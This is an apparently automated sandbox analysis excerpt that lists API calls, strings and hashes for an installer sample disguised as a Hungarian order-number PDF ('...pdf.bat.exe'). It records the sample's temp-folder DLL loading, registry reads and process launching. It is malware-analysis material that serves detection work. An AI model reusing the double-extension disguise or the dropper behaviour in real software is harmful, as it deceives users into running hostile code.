                                              • SetCursor.USER32(00000000), ref: 004045D8
                                              • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404607
                                              • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404619
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2571256074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Similarity
                                              • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                              • String ID: 1C@$Call$N
                                              APIs
                                              • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                              • BeginPaint.USER32(?,?), ref: 00401047
                                              • GetClientRect.USER32(?,?), ref: 0040105B
                                              • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                              • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                              • DeleteObject.GDI32(?), ref: 004010ED
                                              • CreateFontIndirectW.GDI32(?), ref: 00401105
                                              • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                              • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                              • SelectObject.GDI32(00000000,?), ref: 00401140
                                              • DrawTextW.USER32(00000000,00429200,000000FF,00000010,00000820), ref: 00401156
                                              • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                              • DeleteObject.GDI32(?), ref: 00401165
                                              • EndPaint.USER32(?,?), ref: 0040116E
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2571256074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Similarity
                                              • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                              • String ID: F
                                              APIs
                                              • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,0040606B,?,?), ref: 00405F0B
                                              • GetShortPathNameW.KERNEL32(?,00426D88,00000400), ref: 00405F14
                                                • Part of subcall function 00405CDF: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FC4,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CEF
                                                • Part of subcall function 00405CDF: lstrlenA.KERNEL32(00000000,?,00000000,00405FC4,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D21
                                              • GetShortPathNameW.KERNEL32(?,00427588,00000400), ref: 00405F31
                                              • wsprintfA.USER32 ref: 00405F4F
                                              • GetFileSize.KERNEL32(00000000,00000000,00427588,C0000000,00000004,00427588,?,?,?,?,?), ref: 00405F8A
                                              • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405F99
                                              • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD1
                                              • SetFilePointer.KERNEL32(0040A560,00000000,00000000,00000000,00000000,00426988,00000000,-0000000A,0040A560,00000000,[Rename],00000000,00000000,00000000), ref: 00406027
                                              • GlobalFree.KERNEL32(00000000), ref: 00406038
                                              • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0040603F
                                                • Part of subcall function 00405D7A: GetFileAttributesW.KERNELBASE(?,00402F1D,C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D7E
                                                • Part of subcall function 00405D7A: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405DA0
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2571256074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Similarity
                                              • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                              • String ID: %ls=%ls$[Rename]
                                              APIs
                                              • CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe",00403334,C:\Users\user\AppData\Local\Temp\,74DF3420,004035A3,?,00000006,00000008,0000000A), ref: 0040657B
                                              • CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 0040658A
                                              • CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe",00403334,C:\Users\user\AppData\Local\Temp\,74DF3420,004035A3,?,00000006,00000008,0000000A), ref: 0040658F
                                              • CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe",00403334,C:\Users\user\AppData\Local\Temp\,74DF3420,004035A3,?,00000006,00000008,0000000A), ref: 004065A2
                                              Strings
                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00406519, 0040651E
                                              • "C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe", xrefs: 00406518
                                              • *?|<>/":, xrefs: 0040656A
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2571256074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Similarity
                                              • API ID: Char$Next$Prev
                                              • String ID: "C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                              APIs
                                              • GetWindowLongW.USER32(?,000000EB), ref: 0040427F
                                              • GetSysColor.USER32(00000000), ref: 004042BD
                                              • SetTextColor.GDI32(?,00000000), ref: 004042C9
                                              • SetBkMode.GDI32(?,?), ref: 004042D5
                                              • GetSysColor.USER32(?), ref: 004042E8
                                              • SetBkColor.GDI32(?,?), ref: 004042F8
                                              • DeleteObject.GDI32(?), ref: 00404312
                                              • CreateBrushIndirect.GDI32(?), ref: 0040431C
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2571256074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Similarity
                                              • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                              • String ID:
                                              APIs
                                              • GlobalFree.KERNEL32(00000000), ref: 6FBC24DA
                                                • Part of subcall function 6FBC122C: lstrcpynW.KERNEL32(00000000,?,6FBC12DF,00000019,6FBC11BE,-000000A0), ref: 6FBC123C
                                              • GlobalAlloc.KERNEL32(00000040), ref: 6FBC2460
                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 6FBC247B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2603763082.000000006FBC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FBC0000, based on PE: true
                                              Similarity
                                              • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                              • String ID: @Hmu
                                              APIs
                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404BD1
                                              • GetMessagePos.USER32 ref: 00404BD9
                                              • ScreenToClient.USER32(?,?), ref: 00404BF3
                                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404C05
                                              • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404C2B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2571256074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Similarity
                                              • API ID: Message$Send$ClientScreen
                                              • String ID: f
                                              APIs
                                              • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402E11
                                              • MulDiv.KERNEL32(000F231B,00000064,000F251F), ref: 00402E3C
                                              • wsprintfW.USER32 ref: 00402E4C
                                              • SetWindowTextW.USER32(?,?), ref: 00402E5C
                                              • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E6E
                                              Strings
                                              • verifying installer: %d%%, xrefs: 00402E46
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2571256074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Similarity
                                              • API ID: Text$ItemTimerWindowwsprintf
                                              • String ID: verifying installer: %d%%
                                              APIs
                                                • Part of subcall function 6FBC121B: GlobalAlloc.KERNEL32(00000040,?,6FBC123B,?,6FBC12DF,00000019,6FBC11BE,-000000A0), ref: 6FBC1225
                                              • GlobalFree.KERNEL32(?), ref: 6FBC265B
                                              • GlobalFree.KERNEL32(00000000), ref: 6FBC2690
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2603763082.000000006FBC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FBC0000, based on PE: true
                                              Similarity
                                              • API ID: Global$Free$Alloc
                                              • String ID:
                                              APIs
                                              • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402901
                                              • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 0040291D
                                              • GlobalFree.KERNEL32(?), ref: 00402956
                                              • GlobalFree.KERNEL32(00000000), ref: 00402969
                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402981
                                              • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402995
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2571256074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Similarity
                                              • API ID: Global$AllocFree$CloseDeleteFileHandle
                                              • String ID:
                                              APIs
                                              • lstrlenW.KERNEL32(004236E8,004236E8,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B49
                                              • wsprintfW.USER32 ref: 00404B52
                                              • SetDlgItemTextW.USER32(?,004236E8), ref: 00404B65
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2571256074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Similarity
                                              • API ID: ItemTextlstrlenwsprintf
                                              • String ID: %u.%u%s%s$6B
                                              • API String ID: 3540041739-3884863406
                                              • Opcode ID: 4da95cfef184c8e5e741e241c615311e7070c24a3f1e6bca6f3b0d0e52bef44f
                                              • Instruction ID: 22ef8b20c3cb34d9681d0f1950c5ee3b7e818b69147609aa9b6e87f13a537159
                                              • Opcode Fuzzy Hash: 4da95cfef184c8e5e741e241c615311e7070c24a3f1e6bca6f3b0d0e52bef44f
                                              • Instruction Fuzzy Hash: 18110833A041283BDB10A96D9C46F9F329CDB85374F250237FA26F21D1DA79DC2182E8
                                              APIs
                                              • WideCharToMultiByte.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nso4347.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nso4347.tmp\System.dll,00000400,?,?,00000021), ref: 004025E8
                                              • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nso4347.tmp\System.dll,?,?,C:\Users\user\AppData\Local\Temp\nso4347.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nso4347.tmp\System.dll,00000400,?,?,00000021), ref: 004025F3
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2571256074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID: ByteCharMultiWidelstrlen
                                              • String ID: C:\Users\user\AppData\Local\Temp\nso4347.tmp$C:\Users\user\AppData\Local\Temp\nso4347.tmp\System.dll
                                              • API String ID: 3109718747-3922688546
                                              • Opcode ID: 9d8b4e4d9dc988721d41fde04fb3c2a1eeeffc3d26af6733c4ada06497a3d1a6
                                              • Instruction ID: 3dcd1766983357fa33eb9a2b17af164457a9c6038e68ae70dd04151361e6fae4
                                              • Opcode Fuzzy Hash: 9d8b4e4d9dc988721d41fde04fb3c2a1eeeffc3d26af6733c4ada06497a3d1a6
                                              • Instruction Fuzzy Hash: D7110872A00300BEDB146BB1CE89A9F76649F54389F20843BF502F61D1DAFC89425B6E
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2603763082.000000006FBC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FBC0000, based on PE: true
                                              • Associated: 00000000.00000002.2603737645.000000006FBC0000.00000002.00000001.01000000.00000006.sdmp
                                              • Associated: 00000000.00000002.2603777952.000000006FBC3000.00000002.00000001.01000000.00000006.sdmp
                                              • Associated: 00000000.00000002.2603791388.000000006FBC5000.00000002.00000001.01000000.00000006.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6fbc0000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID: FreeGlobal
                                              • String ID:
                                              • API String ID: 2979337801-0
                                              • Opcode ID: c4253058805baffdaa6720d6fcee7642606e222f3d2a8b55b4d1cd7272efe5db
                                              • Instruction ID: 401ed7753318b08e4f616b08a9082879aa566be760cbe75ae28eca02182daae3
                                              • Opcode Fuzzy Hash: c4253058805baffdaa6720d6fcee7642606e222f3d2a8b55b4d1cd7272efe5db
                                              • Instruction Fuzzy Hash: 4D518435D041D99A8B109FB8E5406EFBAB5EF46354F1D826BF430B7140D7B1BA8286A3
                                              APIs
                                              • GetDC.USER32(?), ref: 00401DBC
                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DD6
                                              • MulDiv.KERNEL32(00000000,00000000), ref: 00401DDE
                                              • ReleaseDC.USER32(?,00000000), ref: 00401DEF
                                              • CreateFontIndirectW.GDI32(0040CDA8), ref: 00401E3E
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2571256074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID: CapsCreateDeviceFontIndirectRelease
                                              • String ID:
                                              • API String ID: 3808545654-0
                                              • Opcode ID: 5bd6bd5a0da59a8b862859853f94caf732d3d6ef064c8fd9610db6583930af4a
                                              • Instruction ID: af8ff02f4bd052a881cb17574bfe8b5bbda2d2cac472569fbfdf17f98f113d3f
                                              • Opcode Fuzzy Hash: 5bd6bd5a0da59a8b862859853f94caf732d3d6ef064c8fd9610db6583930af4a
                                              • Instruction Fuzzy Hash: 39017571948240EFE7406BB4AF8ABD97FB49F95301F10457EE241B71E2CA7804459F2D
                                              APIs
                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,6FBC21F0,?,00000808), ref: 6FBC1639
                                              • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,6FBC21F0,?,00000808), ref: 6FBC1640
                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,6FBC21F0,?,00000808), ref: 6FBC1654
                                              • GetProcAddress.KERNEL32(6FBC21F0,00000000), ref: 6FBC165B
                                              • GlobalFree.KERNEL32(00000000), ref: 6FBC1664
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2603763082.000000006FBC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FBC0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6fbc0000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                              • String ID:
                                              • API String ID: 1148316912-0
                                              • Opcode ID: 1185ecaf1ddffb18dfa10a9f32312c18d0abfcd4a932434555fb547f88cb3dd2
                                              • Instruction ID: b184dca3b42f947398e06fcd1b3889a9e230ec1ec42e43ff1c3b289b345976b8
                                              • Opcode Fuzzy Hash: 1185ecaf1ddffb18dfa10a9f32312c18d0abfcd4a932434555fb547f88cb3dd2
                                              • Instruction Fuzzy Hash: EDF012731065387BDA2116A78C4DD9BBE9CDF8F2F5B160251F618D219085614C12D7F1
                                              APIs
                                              • GetDlgItem.USER32(?,?), ref: 00401D63
                                              • GetClientRect.USER32(00000000,?), ref: 00401D70
                                              • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D91
                                              • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D9F
                                              • DeleteObject.GDI32(00000000), ref: 00401DAE
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2571256074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                              • String ID:
                                              • API String ID: 1849352358-0
                                              • Opcode ID: 91c2091e15d9a8546044f03bc55275aa653cd6a2d1fdf25a09177e50126db9cf
                                              • Instruction ID: 40ca5798c6d3b59526a1ee34621216737133408fbccdd52925800404f238639f
                                              • Opcode Fuzzy Hash: 91c2091e15d9a8546044f03bc55275aa653cd6a2d1fdf25a09177e50126db9cf
                                              • Instruction Fuzzy Hash: A3F0EC72A04518AFDB01DBE4DE88CEEB7BCEB48301B14047AF641F61A0CA749D519B78
                                              APIs
                                              • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C8F
                                              • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA7
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2571256074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID: MessageSend$Timeout
                                              • String ID: !
                                              • API String ID: 1777923405-2657877971
                                              • Opcode ID: 9583f5a57c3a775296e031cb14509230db2970ced6148bfab5cafbeadf370f61
                                              • Instruction ID: 994eb4c646dc30d4db2129160ed463076ae6c8af372a05c6722ea4476ca57ad0
                                              • Opcode Fuzzy Hash: 9583f5a57c3a775296e031cb14509230db2970ced6148bfab5cafbeadf370f61
                                              • Instruction Fuzzy Hash: 8E21C371948209AEEF049FB5DE4AABE7BB4EF84304F14443EF605B61D0D7B889409B28
                                              APIs
                                              • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403346,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,74DF3420,004035A3,?,00000006,00000008,0000000A), ref: 00405B5F
                                              • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403346,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,74DF3420,004035A3,?,00000006,00000008,0000000A), ref: 00405B69
                                              • lstrcatW.KERNEL32(?,0040A014,?,00000006,00000008,0000000A), ref: 00405B7B
                                              Strings
                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00405B59
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2571256074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID: CharPrevlstrcatlstrlen
                                              • String ID: C:\Users\user\AppData\Local\Temp\
                                              • API String ID: 2659869361-3081826266
                                              • Opcode ID: cc3b6fad2320eb0d125534955cb1fe8af3638bf69e103b669ecb1462063790d4
                                              • Instruction ID: 08a0f08e2fd7ff087bee52c9af407669d9ccaaad5643cecad56c46479ba8d62d
                                              • Opcode Fuzzy Hash: cc3b6fad2320eb0d125534955cb1fe8af3638bf69e103b669ecb1462063790d4
                                              • Instruction Fuzzy Hash: 63D05E31101A24AAC1117B449C04DDF62ACAE85348382007AF541B20A1C77C695186FD
                                              APIs
                                              • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402DA9
                                              • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DB2
                                              • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DD3
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2571256074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID: Close$Enum
                                              • String ID:
                                              • API String ID: 464197530-0
                                              • Opcode ID: 4f7896fd8e1a6772bb9654ca63d7b3999030aaa3338996957b6cfad32b556e6b
                                              • Instruction ID: 673fb129a4d8ab743942914098bbacbd975ea3c1b6875aa08396d434171036d0
                                              • Opcode Fuzzy Hash: 4f7896fd8e1a6772bb9654ca63d7b3999030aaa3338996957b6cfad32b556e6b
                                              • Instruction Fuzzy Hash: C7116A32500108FBDF02AB90CE09FEE7B7DAF54340F100076B905B51E0EBB59E21AB58
                                              APIs
                                              • DestroyWindow.USER32(00000000,00000000,00403059,00000001,?,00000006,00000008,0000000A), ref: 00402E8C
                                              • GetTickCount.KERNEL32 ref: 00402EAA
                                              • CreateDialogParamW.USER32(0000006F,00000000,00402DF3,00000000), ref: 00402EC7
                                              • ShowWindow.USER32(00000000,00000005,?,00000006,00000008,0000000A), ref: 00402ED5
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2571256074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID: Window$CountCreateDestroyDialogParamShowTick
                                              • String ID:
                                              • API String ID: 2102729457-0
                                              • Opcode ID: e645c8c421be7eabc5c3352734f208b7209d36df5043eda8f294b58fcdf419c5
                                              • Instruction ID: aa51e3e4afe09322c41c699d4a644ad1219c84700ea5711a82ba7ac080bff55b
                                              • Opcode Fuzzy Hash: e645c8c421be7eabc5c3352734f208b7209d36df5043eda8f294b58fcdf419c5
                                              • Instruction Fuzzy Hash: EFF0DA30545720EFC7616B60FE0CA9B7B65BB04B11741497EF449F12A4DBB94891CAAC
                                              APIs
                                              • IsWindowVisible.USER32(?), ref: 0040528F
                                              • CallWindowProcW.USER32(?,?,?,?), ref: 004052E0
                                                • Part of subcall function 00404247: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404259
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2571256074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID: Window$CallMessageProcSendVisible
                                              • String ID:
                                              • API String ID: 3748168415-3916222277
                                              • Opcode ID: 658d549574eddfd40241b3641b5f57dbd5b689929234e885e7ca98b3be3bb27d
                                              • Instruction ID: 4f709491620671f980d9c6db17d5b9619efa9f8d8c8bffacc159c43cff332a87
                                              • Opcode Fuzzy Hash: 658d549574eddfd40241b3641b5f57dbd5b689929234e885e7ca98b3be3bb27d
                                              • Instruction Fuzzy Hash: 20019E7120060CAFDB319F40ED80A9B3B26EF90715F60007AFA00B52D1C73A9C529F69
                                              APIs
                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000800,00000002,?,00000000,?,?,Call,?,?,004063C6,80000002), ref: 00406198
                                              • RegCloseKey.ADVAPI32(?,?,004063C6,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nso4347.tmp\System.dll), ref: 004061A3
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2571256074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID: CloseQueryValue
                                              • String ID: Call
                                              • API String ID: 3356406503-1824292864
                                              • Opcode ID: 359bde3ee35bb60dfaf4513243971435c641af9e5133143b55c2bc1c1ca92d99
                                              • Instruction ID: bbbd3ef8f6d6f34ea5303db1c751cd258066777a1c36f61d7f193cbbff11b307
                                              • Opcode Fuzzy Hash: 359bde3ee35bb60dfaf4513243971435c641af9e5133143b55c2bc1c1ca92d99
                                              • Instruction Fuzzy Hash: B701BC32510209EBDF21CF50CD09EDF3BA8EB04360F01803AFD06A6191D738DA68CBA4
                                              APIs
                                              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,004266F0,Error launching installer), ref: 00405896
                                              • CloseHandle.KERNEL32(?), ref: 004058A3
                                              Strings
                                              • Error launching installer, xrefs: 00405880
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2571256074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID: CloseCreateHandleProcess
                                              • String ID: Error launching installer
                                              • API String ID: 3712363035-66219284
                                              • Opcode ID: 7638236436ef790ce86ec485bfd7c6daeab9176ea3d70cd1a4e3ce55c648647a
                                              • Instruction ID: 38a1dae354cb2a4c5fc32891eb37452fbeb174cf60b6e0268020382365bb363f
                                              • Opcode Fuzzy Hash: 7638236436ef790ce86ec485bfd7c6daeab9176ea3d70cd1a4e3ce55c648647a
                                              • Instruction Fuzzy Hash: FFE0BFB560020ABFFB10AF64ED05F7B7AACFB14704F414535BD51F2150D7B898158A78
                                              APIs
                                              • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,74DF3420,004038B7,004036CD,00000006,?,00000006,00000008,0000000A), ref: 004038F9
                                              • GlobalFree.KERNEL32(?), ref: 00403900
                                              Strings
                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 004038F1
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2571256074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID: Free$GlobalLibrary
                                              • String ID: C:\Users\user\AppData\Local\Temp\
                                              • API String ID: 1100898210-3081826266
                                              • Opcode ID: c5b968993c0533f4145da43d1685cce5539a5f76f40ddb7aa2d82094c30b15f3
                                              • Instruction ID: bd2e2babf5735c078d8cab401dc84ea4626969b40d457a48d01b9ed958f4fa52
                                              • Opcode Fuzzy Hash: c5b968993c0533f4145da43d1685cce5539a5f76f40ddb7aa2d82094c30b15f3
                                              • Instruction Fuzzy Hash: D6E01D339111305FC6315F55ED0475E77A95F54F22F05457BF8807716047745C925BD8
                                              APIs
                                              • lstrlenW.KERNEL32(?,C:\Users\user\Desktop,00402F49,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe,C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405BAB
                                              • CharPrevW.USER32(?,00000000,?,C:\Users\user\Desktop,00402F49,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe,C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405BBB
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2571256074.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID: CharPrevlstrlen
                                              • String ID: C:\Users\user\Desktop
                                              • API String ID: 2709904686-224404859
                                              • Opcode ID: e4f7a16c0d3aeb27420e4918e5816bacf7b9900a4c75110623d7ea7fd9e9117e
                                              • Instruction ID: 7007ae8f4af5416befc6157b9dfefed4fe058ad6210d844be01a540b02b626a9
                                              • Opcode Fuzzy Hash: e4f7a16c0d3aeb27420e4918e5816bacf7b9900a4c75110623d7ea7fd9e9117e
                                              • Instruction Fuzzy Hash: 2ED05EB3411A209AD3226B04DD04D9F77B8EF51304746446AE840A61A6D7B87D8186AC
                                              APIs
                                              • GlobalAlloc.KERNEL32(00000040,?), ref: 6FBC116A
                                              • GlobalFree.KERNEL32(00000000), ref: 6FBC11C7
                                              • GlobalFree.KERNEL32(00000000), ref: 6FBC11D9
                                              • GlobalFree.KERNEL32(?), ref: 6FBC1203
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2603763082.000000006FBC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FBC0000, based on PE: true
